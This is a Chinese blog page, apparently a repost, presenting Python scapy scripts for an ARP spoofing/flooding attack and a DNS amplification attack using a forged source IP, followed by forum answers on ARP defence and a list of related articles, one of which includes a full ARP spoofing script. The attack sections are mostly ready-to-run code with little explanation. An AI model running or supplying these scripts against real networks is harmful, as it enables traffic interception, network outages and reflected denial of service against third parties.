scapy模拟数据包实现arp攻击

最新推荐文章于 2024-02-08 11:00:26 发布
最新推荐文章于 2024-02-08 11:00:26 发布
阅读量4.3k 收藏 3
点赞数
分类专栏: 安全 文章标签: 安全

Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子,pythonscapy


热度 1  评论 183
www.BkJia.Com  网友分享于:   2014-10-24 01:10:52     浏览数7763次

Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子,pythonscapy


scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。

这里就直接用python的scapy搞。

这里是arp的攻击方式,你可以做成arp攻击。

复制代码 代码如下:

#!/usr/bin/python
"""
ARP attack
"""
import sys, os
from scapy.all import *
if os.geteuid() != 0:
    print "This program must be run as root. Aborting."
    sys.exit()

if len(sys.argv) < 2:
    print "Pkease Use %s x.x.x" % (sys.argv[0])
    exit()
attackIP = sys.argv[1] + ".0/24"
srploop(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=attackIP, psrc="192.168.1.100", hwsrc="00:66:66:66:66:66"), timeout=2)

dns放大攻击

复制代码 代码如下:

#coding:utf-8
from scapy import *
from scapy.all import *

a = IP(dst='8.8.8.8',src='192.168.1.200') #192.168.1.200 为伪造的源ip
b = UDP(dport=53)
c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
c.qd=DNSQR(qname='www.qq.com',qtype=1,qclass=1)
p = a/b/c
send(p)
~


arp入侵攻击,DNS欺骗攻击

你好朋友,ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 
ARP攻击主要是存在于局域网网络中,局域网中若有一个人感染ARP木马,则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
建议你安装360木马防火墙,360安全卫士的ARP防火墙对ARP攻击还是很管用的,安装后ARP防火墙默认是关闭的,你自行开启一下,这样就能很好的帮你阻止ARP攻击了,去360官网下载最新的360安全卫士就行,木马防火墙在360安全卫士里。
希望我的回答对你有帮助。
 

DNS欺骗攻击,ARP攻击完全上不了网该怎办

反ARP攻击的绝招,让你在ARP的炮雨攻击下永不掉线 
你的局域网经常掉线吗?你受过ARP攻击吗?出现过烦人的IP冲突吗?如果有,或者以防后患,请看下文,教你反ARP攻击的绝招,让你在ARP的炮雨攻击下永不掉线。 
所遇情况: 
第一。局域网中经常有人用网络执法官、剪刀手等工具限制其他人上网,虽然有反网络执法官等软件,但是用起来甚是不爽啊! 
第二。局域网中有人中了病毒,自动发送大量ARP攻击到局域网中。 
原理: 
ARP协议是windows网络中查找IP和网卡的基础。所以不能绕开它。所有的防御ARP攻击的方法,都必须许可ARP协议。以致目前用着还算可以的网络工具比如360安全卫士,都只能监测到攻击信息,却奈何不了他什么。 
具体方法: 
解决ARP攻击最根本的办法只有一个-----建虚拟网卡。可以使用泡泡鱼虚拟网卡,在大的下载站都有下载。 
把虚拟网卡的IP指定为你正常使用的网卡的网关的IP地址,比如你的网卡的地址现在是10.176.168.33,网关是 10.176.168.1,那么给新的虚拟网卡10.176.168.1地址,然后再把新的虚拟网卡点右键禁用掉。这个网卡必须禁用,否则你上网,都跑到 虚拟网卡了,其实它是不通的。
 

whackw
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
12-23
scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 这里就直接用python的scapy搞。 这里是arp攻击方式,你可以做成arp攻击。 复制...
python 使用scapy库进行ARP欺骗
热门推荐
Jeanphorn的专栏
05-14 1万+
1. 说明  ARP欺骗(ARP spoofing),又称ARP病毒(ARP poisoning)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定电脑或所有电脑无法正常连接。最早探讨ARP欺骗的文章是由Yuri Volobue所写的《ARP与ICMP转向游戏》(ARP and ICMP redirection g
python_scapy实现ARP扫描
get root的博客
11-12 7886
本篇文章介绍了使用python-scapy实现arp扫描,并分析了arp数据包的数据结构,可以用此来准确判断直连设备的主机存活情况。
Python Scapy实现ARP扫描和ARP欺骗
最新发布
YHKKun的博客
02-08 532
ARP欺骗:通过伪造ARP响应来欺骗目标计算机和网关,使它们相信它们正在与对方通信,而实际上所有的通信都经过了攻击者的机器。ARP扫描:检测指定IP网段中哪些主机是在线的,并获取它们的MAC地址。
基于Scapy的传统网络攻击实现
a1379292747的博客
09-14 3138
Scapy是一个由Python编写的强大工具,目前很多优秀的网络扫描攻击工具都使用了这个模块。也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。Scapy还是一个功能强大的交互式数据包操作程序。它能够伪造或解码大量协议的数据包,通过线路发送,捕获它们,匹配请求和回复等等。Scapy可以轻松处理大多数经典任务,如扫描,跟踪路由,探测,单元测试,攻击或网络发现。它可以取代hping,arpspoof,arp-sk,arping,甚至是Nmap,tcpdump和tshark的某些部分。
Python利用scapy实现ARP欺骗
shichimiyasatone的博客
03-27 9954
一、实验原理。        本次用代码实现的是ARP网关欺骗,通过发送错误的网关映射关系导致局域网内其他主机无法正常路由。使用scapyscapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送:eth = Ether(src=src_mac, dst=dst_mac)#赋值src_mac时需要注意,参数为字符串类型 arp = ARP(hws...
scapy模拟攻击_使用scapy进行ARP攻击
weixin_39760389的博客
12-21 569
ARP协议并不只在发送了ARP请求才接收ARP应答。当计算机接收到ARP应答数据包的时候,就会对本地的ARP缓存进行更新,将应答中的IP和MAC地址存储在ARP缓存中。因此,当局域网中的某台机器B向A发送一个自己伪造的ARP应答,而如果这个应答是B冒充C伪造来的,即IP地址为C的IP,而MAC地址是伪造的,则当A接收到B伪造的ARP应答后,就会更新本地的ARP缓存,这样在A看来C的IP地址没有变,...
Scapy网络数据包修改工具
07-25
该工具基于Scapy,用于创建EDIG和修改网络数据包(IT和OT),如IP、UDP、TCP、HTTP、RIP、ICMP、Modubs、Profinet等。
reassembler:Scapy数据包碎片重组引擎
05-26
各种OS IPv4数据包片段重组引擎的Python实现。 一包进来=>六包出 该模块将使用常用的分段重组技术重组分段的数据包。 然后生成6个pcap文件。 它还将有效负载打印到屏幕上,并向您显示每个操作系统在使用碎片整理引擎...
Python利用scapy实现ARP欺骗的方法
01-20
本次用代码实现的是ARP网关欺骗,通过发送错误的网关映射关系导致局域网内其他主机无法正常路由。使用scapyscapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送: eth = Ether...
利用python+scapy抓取DNS数据包
06-04
程序只会抓取DNS数据包。不会去抓取其他类型的数据包
scapy(一):简介及实现ARP攻击
jpygx123的博客
11-20 7509
Scapy是一个强大的交互式数据包处理程序(使用python编写)。它能够伪造或者解码大量的网络协议数据包,能够发送、捕捉、匹配请求和回复包等等。 最重要的他还有很多更优秀的特性——发送无效数据帧、注入修改的802.11数据帧、在WEP上解码加密通道(VOIP)、ARP缓存攻击(VLAN) 等,这也是其他工具无法处理完成的。 用scapy构造数据包Scapy 中可以用特别简单的方法...
python——ARP主机扫描和ARP欺骗
Kris__zhang的博客
10-12 854
一、scapy介绍 scapy是一个可用于网络嗅探的非常强大的第三方库。 具有以下几个特点: 1.交互模式,用作第三方库。 2.可以用开做packet嗅探和伪造packet 3.已经再内部实现了大量的网络协议。(DNS,ARP,IP,TCP,UDP等等),可以用它来编写非常灵活实用的工具。 安装 scapy pip安装 :pip install scapy pip install ipython(运行命令行方式需要) windows下安装scapy需要安装winpcap或者npcap(用于抓取网卡的数据),
scapy学习arp欺骗
cracker_zhou的博客
02-04 7859
在以太网协议中规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须要知道目标主机的MAC地址。于是需要一种方法,根据目的主机的IP地址,获得其MAC地址。这就是ARP协议要做的事情。所谓地址解析(address resolution)就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。   地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息
ARP攻击实现详解
mxway的专栏
03-26 8898
声明:本文只用于技术交流和学习使用,严禁用于任何其它用途,严禁转载。若因本文带来的任何麻烦,本人不承担任何连带责任。 一、ARP协议 关于arp协议作用就不再这里多说了,直接看下图 图1 上图来源于TCP-IP协议详解卷1的图4-3 图1中以太网目的地址,以太网源地址,发送端以太地址,发送端IP地址,目的以太网地址,目的IP地址这几个字段的含义很明显。主要看剩下几个字段的取值用途是什
linux Scapy 进行arp数据包详细过程
qq_37719766的博客
03-17 2713
root@hak:~# scapyWARNING: No route found for IPv6destination :: (no default route?)INFO: Can'timport python ecdsa lib. Disabled certificate manipulation toolsWelcome to Scapy (unknown.version)&gt;&gt;...
基于ARP发现内网活跃主机
MingShenfree的博客
10-10 526
一,ARP协议简介 ARP的中文名称为“地址解析协议”,位于第三层网络层,主要用在以太网(内网)中。有一点需要明确,所有的主机在互联网中通信的时候使用的是ip地址,而在以太网中通信时使用的确是硬件地址(mac地址)。 这个协议用在只知道目标IP地址的情况下发现物理地址,当所使用的主机只知道目的主机地址(IP地址)却不知道目标的硬件地址时,就需要使用以太网广播包给网络上的每一台主机发送ARP请求. 假设当前以太网环境中有四台主机A,B,C,D ...
有一段python的编码程序如下图_编写Python脚本进行ARP
weixin_39610488的博客
12-02 116
1.系统环境:ubuntu 16.04python版本:2.72.攻击机器:ubuntu(192.16.0.14)目标机器:windows 7(192.168.0.9)网关:(192.168.0.1)3.首先使用下面命令安装scapy模块pip install scapy4.关于arp欺骗的原理以及arp包的格式请自行百度,在此不作过多描述from scapy.all import *import...
dns放大攻击python代码_Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子...
weixin_42133969的博客
02-01 357
scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。这里就直接用python的scapy搞。这里是arp攻击方式,你可以做成arp攻击。#!/usr/bin/python"""ARP attack"""import sys, osfrom scapy.all import *if os.geteuid() != 0:...
scapy ARP攻击
08-14
Scapy是一个强大的Python库,用于网络数据包的创建、发送和捕获。要进行ARP攻击,你可以使用Scapy来构建和发送ARP欺骗数据包。 下面是一个使用Scapy进行ARP欺骗攻击的示例代码: ```python from scapy.all import * def arp_spoof(target_ip, spoof_ip): target_mac = get_mac(target_ip) packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) send(packet, verbose=0) def get_mac(ip): arp_request = ARP(op=1, pdst=ip) broadcast = Ether(dst="ff:ff:ff:ff:ff:ff") packet = broadcast/arp_request result = srp(packet, timeout=3, verbose=0)[0] return result[0][1].hwsrc target_ip = "192.168.1.100" # 目标IP地址 spoof_ip = "192.168.1.1" # 欺骗IP地址 try: while True: arp_spoof(target_ip, spoof_ip) arp_spoof(spoof_ip, target_ip) except KeyboardInterrupt: print("ARP攻击已停止") ``` 请注意,进行ARP攻击可能违反法律规定,除非在合法的授权和测试环境下使用。确保在进行任何网络测试之前,获得适当的授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值